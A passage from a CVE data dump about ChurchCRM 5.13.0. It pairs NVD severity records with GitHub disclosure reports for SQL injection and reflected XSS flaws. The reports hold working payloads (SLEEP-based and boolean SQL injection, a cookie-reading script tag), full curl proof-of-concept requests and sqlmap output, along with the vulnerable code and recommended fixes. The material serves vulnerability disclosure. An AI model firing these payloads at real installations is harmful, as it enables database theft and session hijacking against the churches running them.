- Administrator or a user with permission to list `event types`
#### **Description**
A vulnerability exists in **ChurchCRM** that allows an attacker to execute arbitrary SQL queries by exploiting a **time-based blind SQL Injection** vulnerability in the **EditEventTypes** functionality. The `newCountName` parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to **data exfiltration, modification, or deletion.**
## Exploiting the SQL Injection
#### **Affected Asset:**
- `http://<server_ip>/EditEventTypes.php`
#### **Vulnerable Source Code:**
```php
ctid = mb_substr($_POST['Action'], 7);
$sSQL = "DELETE FROM eventcountnames_evctnm WHERE evctnm_countid='$ctid' LIMIT 1";
RunQuery($sSQL);
} else {
switch ($_POST['Action']) {
case 'ADD':
$newCTName = $_POST['newCountName'];
$theID = $_POST['EN_tyid'];
$sSQL = "INSERT eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES ('$theID','$newCTName')";
RunQuery($sSQL);
break;
```
#### **Steps to Reproduce:**
1. Navigate to the EditEventTypes endpoint: `http://<server_ip>/EditEventTypes.php`
2. Intercept the request using a tool like **Burp Suite** or manually craft a request.
3. Modify the `newCountName` parameter with the following SQL Injection payload:
```sql
4' AND (SELECT 6419 FROM (SELECT(SLEEP(5)))PYsF) AND 'KmGS'='KmGS
```
4. Observe the response time delay, indicating that SQL Injection is possible.
#### **Proof of Concept (PoC):**
**Exploiting Time-Based Blind SQL Injection**
```bash
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: <server_ip>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' \
-H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' \
-H $'Content-Type: application/x-www-form-urlencoded' \
-H $'Content-Length: 175' -H $'Origin: http://<server_ip>' -H $'Connection: keep-alive' \
-H $'Referer: http://<server_ip>/EditEventTypes.php' \
-H $'sec-ch-ua-platform: "Windows"' -H $'sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"' \
-H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0' \
-b $'<CRM-Cookie>' \
--data-binary $'EN_tyid=1&EN_ctid=&newEvtName=Church%20Service&newEvtStartTime=10:30:00&newCountName=4\'%20AND%20(SELECT%206419%20FROM%20(SELECT(SLEEP(5)))PYsF)%20AND%20\'KmGS\'\=\'KmGS&Action=ADD' \
$'http://<server_ip>/EditEventTypes.php'
```
**Observed Response:**
- The request results in a **5-second delay**, confirming the SQL Injection vulnerability.
---
#### **Impact:**
- **Data Exfiltration:** Attackers can dump the database and retrieve sensitive data, such as **user credentials** and **admin tokens**.
- **Database Manipulation:** Attackers can modify, delete, or corrupt important data.
- **Remote Code Execution (RCE) Possibility:** Depending on the database configuration, this vulnerability could lead to RCE by leveraging database functions to execute OS-level commands.
#### **Recommended Fix:**
- Use **prepared statements (parameterized queries)** to prevent SQL Injection. Example:
```php
$stmt = $pdo->prepare("INSERT INTO eventcountnames_evctnm (evctnm_eventtypeid, evctnm_countname) VALUES (?, ?)");
$stmt->execute([$theID, $newCTName]);
```
- Implement **input validation** to reject dangerous characters.
- Apply **principle of least privilege** to database users to limit damage from SQL Injection.
- Adding **Data Type Assignment in PHP** for the `newCountName` variable. E.g. if it is a name, change it to `Int`
#### **Environment:**
- **Application:** ChurchCRM 5.13.0
- **Tested on:** Provided Docker in release
| Bug: (CVE-2025-1023) - SQL Injection in newCountName Parameter via EditEventTypes.php | https://api.github.com/repos/ChurchCRM/CRM/issues/7246/comments | 5 | 2025-02-04T10:46:36Z | 2025-04-25T02:54:23Z | https://github.com/ChurchCRM/CRM/issues/7246 | 2,829,779,628 | 7,246 | 6,536 |
CVE-2025-1024 | 2025-02-19T09:15:10.280 | A vulnerability exists in ChurchCRM 5.13.0 that allows an attacker to execute arbitrary JavaScript in a victim's browser via Reflected Cross-Site Scripting (XSS) in the EditEventAttendees.php page. This requires Administration privileges and affects the EID parameter. The flaw allows an attacker to steal session cookies, perform actions on behalf of an authenticated user, and gain unauthorized access to the application. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "YES",
"Recovery": "USER",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "AMBER",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"valueDensity": "CONCENTRATED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:L/VA:H/SC:H/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:L/U:Amber",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "LOW"
},
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"type": "Secondary"
}
]
} | [
{
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ChurchCRM/CRM/issues/7250"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "552A51B0-B2AE-4A12-BF43-DDCE1D8A29D2",
"versionEndExcluding": null,
"versionEndIncluding": "5.13.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/ChurchCRM/CRM/issues/7250 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ChurchCRM",
"CRM"
] | #### **Severity:**
🔴 **High** (CWE-79: Improper Neutralization of Input During Web Page Generation)
- ___A CVE will be assigned once the vendor reviews the issue (CVE-2025-1024)___
#### **Authorization Required:**
- Administrator
#### **Description:**
A vulnerability exists in **ChurchCRM 5.13.0** that allows an attacker to execute arbitrary JavaScript in a victim's browser via Reflected Cross-Site Scripting (XSS) in the **EditEventAttendees.php** page. This flaw allows an attacker to steal session cookies, perform actions on behalf of an authenticated user, and gain unauthorized access to the application.
## Simple Payload - Reflected XSS
#### **Affected Asset:**
- `http://<CHURCH_CRM>/EditEventAttendees.php`
#### **Affected Parameter:**
- `EID`
#### **Impact:**
- **Session Hijacking:** Attackers can steal session cookies to gain unauthorized access.
- **Arbitrary JavaScript Execution:** Attackers can execute JavaScript within the context of the victim’s session.
- **User Impersonation:** Exploiting the XSS can allow attackers to perform actions on behalf of the victim.
---
### **Steps to Reproduce:**
1. Navigate to `http://<CHURCH_CRM>/EditEventAttendees.php`.
2. Inject the following payload into the `EID` parameter:
```javascript
3"><script>alert(document.cookie);</script>
```
3. Submit the request.
4. The injected script executes, displaying the session cookie.
5. The attacker can now steal and use the cookie for session hijacking.
---
### **Proof of Concept (PoC)**
#### **Request:**
```bash
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: <CHURCH_CRM>' \
-H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' \
-H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H $'Accept-Language: en-US,en;q=0.5' \
-H $'Accept-Encoding: gzip, deflate, br' \
-H $'Content-Type: application/x-www-form-urlencoded' \
-H $'Content-Length: 154' \
-H $'Origin: http://<CHURCH_CRM>' \
-H $'Connection: keep-alive' \
-H $'Referer: http://<CHURCH_CRM>/ListEvents.php' \
-H $'Upgrade-Insecure-Requests: 1' \
-H $'sec-ch-ua-platform: "Windows"' \
-H $'sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"' \
-H $'sec-ch-ua-mobile: ?0' \
-H $'Priority: u=0, i' \
-b $'<CRM-COOKIE>' \
--data-binary $'EID=3"><script>alert(document.cookie);</script>&EName=Summer%20Camp&EDesc=Summer%20Camp&EDate=June%2006%202017%2009:30%20am&Action=Attendees' \
$'http://<CHURCH_CRM>/EditEventAttendees.php'
```
#### **Observed Response:**
- The injected script executes within the victim’s session, displaying an alert box containing their session cookie.
---
### **Recommended Fix:**
- Implement **output encoding** to neutralize script injections in user-controlled parameters.
- Use **Content Security Policy (CSP)** to restrict JavaScript execution from untrusted sources.
- Ensure all cookies are set with **`HttpOnly`** and **`Secure`** flags to prevent client-side access.
- Perform **input validation and sanitization** before rendering user-controlled data in the response.
#### **Environment:**
- **Application:** ChurchCRM 5.13.0
- **Tested on:** Provided Docker in release
| Bug: (CVE-2025-1024) - Session Hijacking via Reflected Cross-Site Scripting (XSS) in EditEventAttendees.php | https://api.github.com/repos/ChurchCRM/CRM/issues/7250/comments | 3 | 2025-02-08T04:20:22Z | 2025-05-11T03:05:11Z | https://github.com/ChurchCRM/CRM/issues/7250 | 2,839,503,293 | 7,250 | 6,537 |
CVE-2025-1132 | 2025-02-19T09:15:10.417 | A time-based blind SQL Injection vulnerability exists in the ChurchCRM 5.13.0 and prior EditEventAttendees.php within the EN_tyid parameter. The parameter is directly inserted into an SQL query without proper sanitization, allowing attackers to inject malicious SQL commands. Please note that the vulnerability requires Administrator permissions. This flaw can potentially allow attackers to delay the response, indicating the presence of an SQL injection vulnerability. While it is a time-based blind injection, it can be exploited to gain insights into the underlying database, and with further exploitation, sensitive data could be retrieved. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "YES",
"Recovery": "USER",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "RED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"valueDensity": "CONCENTRATED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:H/U:Red",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "HIGH"
},
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"type": "Secondary"
}
]
} | [
{
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ChurchCRM/CRM/issues/7251"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "552A51B0-B2AE-4A12-BF43-DDCE1D8A29D2",
"versionEndExcluding": null,
"versionEndIncluding": "5.13.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/ChurchCRM/CRM/issues/7251 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ChurchCRM",
"CRM"
] | #### **Severity:**
⚫ **Critical** (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)
- ___A CVE will be assigned once the application team reviews the issue (CVE-2025-1132)___
#### **Authorization Required:**
- Administrator or authenticated user access required to view the `EventEditor.php` page.
#### **Description:**
A **time-based blind SQL Injection** vulnerability exists in **EditEventAttendees.php** within the `EN_tyid` parameter. The parameter is directly inserted into an SQL query without proper sanitization, allowing attackers to inject malicious SQL commands. This flaw can potentially allow attackers to delay the response (through the use of `SLEEP()`), indicating the presence of an SQL injection vulnerability. While it is a time-based blind injection, it can be exploited to gain insights into the underlying database, and with further exploitation, sensitive data could be retrieved.
#### **Exploiting the SQL Injection**
#### **Affected Asset:**
- `http://<CHURCHCRM>/EventEditor.php`
#### **Vulnerable Source Code:**
```php
if (isset($_GET['calendarAction'])) {
$sAction = 'Edit';
$sOpp = $_GET['calendarAction'];
} else {
if (array_key_exists('Action', $_POST)) {
$sAction = $_POST['Action'];
}
if (array_key_exists('EID', $_POST)) {
$sOpp = $_POST['EID']; // from EDIT button on event listing
}
$tyid = 0;
if (array_key_exists('EN_tyid', $_POST)) {
$tyid = $_POST['EN_tyid'];
}
}
if ($sAction === 'Create Event' && !empty($tyid)) {
// User is coming from the event types screen and thus there
// is no existing event in the event_event table
$sSQL = "SELECT * FROM event_types WHERE type_id=$tyid";
...
}
```
- **Vulnerability:** `$tyid` is inserted into the SQL query without sanitization or parameterization, leading to SQL Injection.
#### **Steps to Reproduce:**
1. Navigate to the EventEditor endpoint: `http://<CHURCHCRM>/EventEditor.php`
2. Intercept the request using a tool like **Burp Suite** or manually craft a request.
3. Modify the `EN_tyid` parameter in the POST request with the following payload to test the time-based blind SQL Injection:
```sql
1 AND (SELECT 1638 FROM (SELECT(SLEEP(8)))shSx)
```
4. Observe an `8-second` delay in the response, indicating that SQL Injection is successful.
#### **Proof of Concept (PoC):**
**Exploiting Time-Based Blind SQL Injection**
```bash
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: <CHURCHCRM>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 81' -H $'Origin: http://<CHURCHCRM>' -H $'Connection: keep-alive' -H $'Referer: http://<CHURCHCRM>/EventEditor.php' -H $'Upgrade-Insecure-Requests: 1' -H $'sec-ch-ua-platform: \"Windows\"' -H $'sec-ch-ua: \"Google Chrome\";v=\"117\", \"Chromium\";v=\"117\", \"Not=A?Brand\";v=\"24\"' -H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0, i' \
-b $'<CRM-COOKIE>' \
--data-binary $'EventID=0&EventExists=0&EN_tyid=1+AND+(SELECT+1638+FROM+(SELECT(SLEEP(8)))shSx)\x0d\x0a' \
$'http://<CHURCHCRM>/EventEditor.php'
```
**Observed Response:**
- The request results in an **8-second delay**, confirming the SQL Injection vulnerability.
#### **Automated Exploitation POC - Banner Dump**
```bash
sqlmap -r r --dbms=mariadb -p EN_tyid --technique=T -b
---
Parameter: EN_tyid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EN_tyid=1 AND (SELECT 1638 FROM (SELECT(SLEEP(5)))shSx)
---
[04:18:00] [INFO] the back-end DBMS is MySQL
[04:18:00] [INFO] fetching banner
[04:18:00] [INFO] retrieved: 11.6.2-MariaDB-ubu2404
[04:18:00] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[04:18:17] [INFO] adjusting time delay to 2 seconds due to good response times
[04:18:17] [INFO] banner: '11.6.2-MariaDB-ubu2404'
```
#### **Impact:**
- **Data Exfiltration:** Attackers can potentially gather sensitive data by timing queries to exfiltrate information.
- **Database Manipulation:** Attackers could craft further SQL Injection queries to modify or delete data.
- **Denial of Service (DoS):** Repeated time-based payloads could disrupt the application by causing delays.
- **Potential Further Exploits:** An attacker could escalate the attack to retrieve more data or perform actions that affect the application or server.
#### **Recommended Fix:**
- **Prepared Statements (Parameterized Queries):** Always use prepared statements to prevent SQL injection.
- **Input Validation:** Implement strict input validation to ensure that only valid and expected inputs are allowed.
- **Database Permissions:** Ensure database users only have the minimum necessary permissions to mitigate potential damage from exploitation.
- **Error Handling:** Avoid exposing database error messages to the user, as they can provide insight into potential vulnerabilities.
#### **Environment:**
- **Application:** Version 1.0
- **Tested on:** Local test environment running on Docker with MariaDB and Apache/PHP stack. | Bug: (CVE-2025-1132) - SQL Injection in EN_tyid Parameter via EditEventAttendees.php | https://api.github.com/repos/ChurchCRM/CRM/issues/7251/comments | 3 | 2025-02-08T04:22:40Z | 2025-05-11T03:05:10Z | https://github.com/ChurchCRM/CRM/issues/7251 | 2,839,506,809 | 7,251 | 6,538 |
CVE-2025-1133 | 2025-02-19T09:15:10.550 | A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a boolean-based blind SQL Injection vulnerability in the EditEventAttendees functionality. The EID parameter is directly concatenated into an SQL query without proper sanitization, making it susceptible to SQL injection attacks. An attacker can manipulate the query, potentially leading to data exfiltration, modification, or deletion. Please note that this vulnerability requires Administrator privileges. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "YES",
"Recovery": "USER",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "RED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"valueDensity": "CONCENTRATED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:H/U:Red",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "HIGH"
},
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"type": "Secondary"
}
]
} | [
{
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/ChurchCRM/CRM/issues/7252"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "552A51B0-B2AE-4A12-BF43-DDCE1D8A29D2",
"versionEndExcluding": null,
"versionEndIncluding": "5.13.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/ChurchCRM/CRM/issues/7252 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"ChurchCRM",
"CRM"
] | #### **Severity:**
⚫ **Critical** (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)
- ___A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-1133)___
#### **Authorization Required:**
- Administrator access required to view `EditEventAttendees.php`.
#### **Description:**
A vulnerability exists in **ChurchCRM** that allows an attacker to execute arbitrary SQL queries by exploiting a **boolean-based blind SQL Injection** vulnerability in the `EditEventAttendees` functionality. The `EID` parameter is directly concatenated into an SQL query without proper sanitization, making it susceptible to SQL injection attacks. An attacker can manipulate the query, potentially leading to **data exfiltration, modification, or deletion**.
## Exploiting the SQL Injection
#### **Affected Asset:**
- `http://<CHURCH_CRM>/EditEventAttendees.php`
#### **Vulnerable Source Code:**
```php
$EventID = $_POST['EID']; // from ListEvents button=Attendees
$sSQL = 'SELECT person_id, per_LastName FROM event_attend JOIN person_per ON person_per.per_id = event_attend.person_id WHERE event_id = ' . $EventID . ' ORDER by per_LastName, per_FirstName';
```
- **Vulnerability:** The `$EventID` parameter is directly inserted into an SQL query without escaping or proper datatype specification, making it vulnerable to SQL Injection.
#### **Steps to Reproduce:**
1. Navigate to the `EditEventAttendees.php` endpoint: `http://<CHURCH_CRM>/EditEventAttendees.php`
2. Intercept the request using a tool like **Burp Suite** or manually craft a request.
3. Modify the `EID` parameter with the following SQL Injection payload:
```sql
1 AND 5302=5302
```
4. Observe the response or potential changes in the query execution indicating that SQL Injection is possible.
#### **Proof of Concept (PoC):**
**Exploiting Boolean-Based Blind SQL Injection**
```bash
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: <CHURCH_CRM>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 135' -H $'Origin: http://<CHURCH_CRM>' -H $'Connection: keep-alive' -H $'Referer: http://<CHURCH_CRM>/ListEvents.php' -H $'Upgrade-Insecure-Requests: 1' -H $'sec-ch-ua-platform: \"Windows\"' -H $'sec-ch-ua: \"Google Chrome\";v=\"117\", \"Chromium\";v=\"117\", \"Not=A?Brand\";v=\"24\"' -H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0, i' \
-b $'<CRM-COOKIE>' \
--data-binary $'EID=3%20AND%205302=5302&EName=Summer%20Campalert(1)&EDesc=Summer%20Campalert(1)&EDate=June%2006%202017%2009:30%20am&Action=Attendees(1)' \
$'http://<CHURCH_CRM>/EditEventAttendees.php'
```
**Observed Response:**
- The request results in a **successful response**, confirming the SQL Injection vulnerability.
### Automated Exploitation POC - Banner
```bash
---
Parameter: EID (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: EID=3 AND 5302=5302&Action=Attendees
---
[06:02:11] [INFO] the back-end DBMS is MySQL
[06:02:11] [INFO] fetching banner
[06:02:11] [INFO] retrieved: 22
[06:02:32] [INFO] retrieved: 11.6.2-MariaDB-ubu2404
web server operating system: Linux Debian
web application technology: Apache 2.4.62, PHP 8.4.3
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '11.6.2-MariaDB-ubu2404'
```
#### **Impact:**
- **Data Exfiltration:** Attackers can dump the database and retrieve sensitive data, such as **user credentials** and **event information**.
- **Database Manipulation:** Attackers can modify, delete, or corrupt important data.
- **Remote Code Execution (RCE) Possibility:** Depending on the database configuration, this vulnerability could lead to RCE by leveraging database functions to execute OS-level commands.
#### **Recommended Fix:**
- Use **prepared statements (parameterized queries)** to prevent SQL Injection.
- Implement **input validation** to reject dangerous characters.
- Apply **principle of least privilege** to database users to limit damage from SQL Injection.
- **Sanitize and validate the `$EventID` variable** before using it in the SQL query. Ensure it is an integer or properly escaped.
#### **Environment:**
- **Application:** ChurchCRM 5.13.0
- **Tested on:** Provided Docker in release | Bug: (CVE-2025-1133) - SQL Injection in EID Parameter via EditEventAttendees.php | https://api.github.com/repos/ChurchCRM/CRM/issues/7252/comments | 3 | 2025-02-08T04:23:57Z | 2025-05-11T03:05:09Z | https://github.com/ChurchCRM/CRM/issues/7252 | 2,839,508,441 | 7,252 | 6,539 |
CVE-2025-1134 | 2025-02-19T09:15:10.687 | A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a boolean-based and time-based blind SQL Injection vulnerability in the DonatedItemEditor functionality. The CurrentFundraiser parameter is directly concatenated into an SQL query without sufficient sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion. Please note that this vulnerability requires Administrator privileges. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "YES",
"Recovery": "USER",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
